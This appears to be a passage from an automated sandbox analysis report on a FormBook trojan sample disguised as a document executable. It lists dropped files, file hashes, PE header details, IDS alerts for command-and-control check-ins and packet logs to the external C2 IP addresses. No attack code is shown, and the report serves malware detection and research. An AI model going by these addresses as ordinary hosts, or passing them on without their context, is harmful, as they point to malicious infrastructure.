                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\F-385HLwx

                                      Download File
                                      Process:C:\Windows\SysWOW64\cttune.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.1209886597424439
                                      Encrypted:false
                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l13q50rq.a1x.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxd3pgin.a0i.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly0caxxx.fjh.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tggyfibh.la0.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.95843215028945
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:Doc 1Z881A080453968203.exe
                                      File size:733'184 bytes
                                      MD5:51812b068c74b61db320570d6d13ee07
                                      SHA1:b7ab99a410a35b08a97edab12cc460863fd9d300
                                      SHA256:62ce98f7fcd773efa3deac85904b54c17b456af92b6e778c2adfc998bd07f5c3
                                      SHA512:c431124a9da4bfd3d39fa266e7e63bdeb2d0b8b510286e2225e875998baa5a6debe69463b4b60545e84f8dcadef92afd5779c51876cf7ee5d1dd8363a6fda90a
                                      SSDEEP:12288:Qk3/T3/fVrTtK3/lY8pBMFCcj3fW/mLFx1nDjstwVxAE1Q/Hz57PsHDc3/a3/:DrXVrTtKNdp6Ce3+UxG6HQfz57PUDci
                                      TLSH:B5F423C0729A4B21D22FA3F41A5B5B0013A136233852FDA86EE69CDD18BFF55DF5021B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3f..............0......8........... ... ....@.. ....................................@................................

                                      File Icon

                                      Icon Hash:0773f1fcfccc6113

                                      Static PE Info

                                      General

                                      Entrypoint:0x4b0ac6
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66338AF8 [Thu May 2 12:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      aaa
                                      inc edi
                                      aaa
                                      dec eax
                                      xor eax, 42000000h
                                      xor eax, 4E343531h
                                      xor eax, 32414939h
                                      dec ecx
                                      aaa
                                      aaa
                                      inc ebp
                                      xor al, 56h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb0a740x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x2ce4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xaeaec0xaf0007fb9eb08d60247731f496708c52a0d27False0.9616587611607142data7.976391309328641IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xb20000x2ce40x30009322a0bf51c39e1bea8c235191429ad5False0.8714192708333334data7.429669013417263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xb60000xc0x80088e90f70295545baf035d11bc935769aFalse0.015625data0.024299385236084957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xb21000x26cdPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9980871841336958
                                      RT_GROUP_ICON0xb47e00x14data1.05
                                      RT_VERSION0xb48040x2e0data0.4470108695652174
                                      RT_MANIFEST0xb4af40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      05/04/24-10:10:16.842546TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24970980192.168.2.891.195.240.123
                                      05/04/24-10:10:33.998564TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971080192.168.2.887.107.55.55
                                      05/04/24-10:10:55.056211TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971580192.168.2.835.215.179.87
                                      05/04/24-10:10:45.265920TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971380192.168.2.887.107.55.55
                                      05/04/24-10:10:52.210291TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971480192.168.2.835.215.179.87
                                      05/04/24-10:10:38.910872TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971180192.168.2.887.107.55.55

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 4, 2024 10:10:16.531738043 CEST4970980192.168.2.891.195.240.123
                                      May 4, 2024 10:10:16.839709044 CEST804970991.195.240.123192.168.2.8
                                      May 4, 2024 10:10:16.839808941 CEST4970980192.168.2.891.195.240.123
                                      May 4, 2024 10:10:16.842545986 CEST4970980192.168.2.891.195.240.123
                                      May 4, 2024 10:10:17.150382042 CEST804970991.195.240.123192.168.2.8
                                      May 4, 2024 10:10:17.150405884 CEST804970991.195.240.123192.168.2.8
                                      May 4, 2024 10:10:17.150594950 CEST4970980192.168.2.891.195.240.123
                                      May 4, 2024 10:10:17.383016109 CEST4970980192.168.2.891.195.240.123
                                      May 4, 2024 10:10:17.690941095 CEST804970991.195.240.123192.168.2.8
                                      May 4, 2024 10:10:33.277400017 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:33.668833971 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:33.668958902 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:33.998564005 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:34.387891054 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.455874920 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.455990076 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456002951 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456017017 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456031084 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456042051 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456051111 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456063986 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456077099 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456089973 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.456090927 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.456134081 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.456155062 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.846956968 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.846992016 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847003937 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847018003 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847031116 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847043991 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847057104 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847071886 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847078085 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847084999 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847098112 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847120047 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847141981 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847162008 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847176075 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847187042 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847198963 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847203016 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847219944 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847229958 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847254992 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847256899 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847269058 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847282887 CEST804971087.107.55.55192.168.2.8
                                      May 4, 2024 10:10:35.847315073 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:35.847341061 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:37.502634048 CEST4971080192.168.2.887.107.55.55
                                      May 4, 2024 10:10:38.511408091 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:38.889579058 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:38.889681101 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:38.910871983 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:39.288793087 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284658909 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284681082 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284693003 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284706116 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284719944 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284733057 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284756899 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284760952 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.284770966 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284784079 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284792900 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.284800053 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.284809113 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.284847975 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.413487911 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663069010 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663093090 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663105965 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663120031 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663132906 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663152933 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663166046 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663239956 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663280010 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663294077 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663403034 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663440943 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663454056 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663466930 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663470030 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663470030 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663470030 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663482904 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663499117 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663506985 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663522959 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663543940 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663563967 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663718939 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663732052 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663744926 CEST804971187.107.55.55192.168.2.8
                                      May 4, 2024 10:10:40.663759947 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.663778067 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:40.665920019 CEST4971180192.168.2.887.107.55.55
                                      May 4, 2024 10:10:41.433456898 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:41.823837042 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:41.823999882 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:41.830506086 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:42.218811989 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140288115 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140311003 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140403986 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140419006 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140470028 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.140552998 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140567064 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140599966 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.140675068 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.140691996 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140706062 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140717030 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140731096 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.140810013 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.140883923 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.344125032 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528646946 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528666019 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528677940 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528692007 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528714895 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528764963 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528794050 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528798103 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528811932 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528824091 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528835058 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528836966 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528851032 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528862000 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528862953 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528882027 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528889894 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528894901 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528908014 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.528918028 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.528944969 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.529762983 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.529783010 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.529795885 CEST804971287.107.55.55192.168.2.8
                                      May 4, 2024 10:10:43.529795885 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.529820919 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:43.529833078 CEST4971280192.168.2.887.107.55.55
                                      May 4, 2024 10:10:44.885195017 CEST4971380192.168.2.887.107.55.55
                                      May 4, 2024 10:10:45.263823032 CEST804971387.107.55.55192.168.2.8
                                      May 4, 2024 10:10:45.263942003 CEST4971380192.168.2.887.107.55.55
                                      May 4, 2024 10:10:45.265919924 CEST4971380192.168.2.887.107.55.55
                                      May 4, 2024 10:10:45.643574953 CEST804971387.107.55.55192.168.2.8
                                      May 4, 2024 10:10:46.495450020 CEST804971387.107.55.55192.168.2.8
                                      May 4, 2024 10:10:46.495474100 CEST804971387.107.55.55192.168.2.8
                                      May 4, 2024 10:10:46.495681047 CEST4971380192.168.2.887.107.55.55
                                      May 4, 2024 10:10:46.498527050 CEST4971380192.168.2.887.107.55.55
                                      May 4, 2024 10:10:46.876533031 CEST804971387.107.55.55192.168.2.8
                                      May 4, 2024 10:10:51.903270960 CEST4971480192.168.2.835.215.179.87
                                      May 4, 2024 10:10:52.208111048 CEST804971435.215.179.87192.168.2.8
                                      May 4, 2024 10:10:52.208225965 CEST4971480192.168.2.835.215.179.87
                                      May 4, 2024 10:10:52.210290909 CEST4971480192.168.2.835.215.179.87
                                      May 4, 2024 10:10:52.514060974 CEST804971435.215.179.87192.168.2.8
                                      May 4, 2024 10:10:52.514086962 CEST804971435.215.179.87192.168.2.8
                                      May 4, 2024 10:10:52.514102936 CEST804971435.215.179.87192.168.2.8
                                      May 4, 2024 10:10:52.514215946 CEST4971480192.168.2.835.215.179.87
                                      May 4, 2024 10:10:53.725785017 CEST4971480192.168.2.835.215.179.87
                                      May 4, 2024 10:10:54.744533062 CEST4971580192.168.2.835.215.179.87
                                      May 4, 2024 10:10:55.049633980 CEST804971535.215.179.87192.168.2.8
                                      May 4, 2024 10:10:55.049787998 CEST4971580192.168.2.835.215.179.87
                                      May 4, 2024 10:10:55.056210995 CEST4971580192.168.2.835.215.179.87
                                      May 4, 2024 10:10:55.360255003 CEST804971535.215.179.87192.168.2.8
                                      May 4, 2024 10:10:55.360435963 CEST804971535.215.179.87192.168.2.8
                                      May 4, 2024 10:10:55.360452890 CEST804971535.215.179.87192.168.2.8
                                      May 4, 2024 10:10:55.360501051 CEST4971580192.168.2.835.215.179.87
                                      May 4, 2024 10:10:56.592622995 CEST4971580192.168.2.835.215.179.87
                                      May 4, 2024 10:10:57.603759050 CEST4971680192.168.2.835.215.179.87
                                      May 4, 2024 10:10:57.908715963 CEST804971635.215.179.87192.168.2.8
                                      May 4, 2024 10:10:57.908926964 CEST4971680192.168.2.835.215.179.87
                                      May 4, 2024 10:10:57.911011934 CEST4971680192.168.2.835.215.179.87
                                      May 4, 2024 10:10:58.215961933 CEST804971635.215.179.87192.168.2.8
                                      May 4, 2024 10:10:58.215990067 CEST804971635.215.179.87192.168.2.8
                                      May 4, 2024 10:10:58.216006041 CEST804971635.215.179.87192.168.2.8
                                      May 4, 2024 10:10:58.216109991 CEST4971680192.168.2.835.215.179.87
                                      May 4, 2024 10:10:59.835644960 CEST4971680192.168.2.835.215.179.87

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 4, 2024 10:10:16.348045111 CEST6118653192.168.2.81.1.1.1
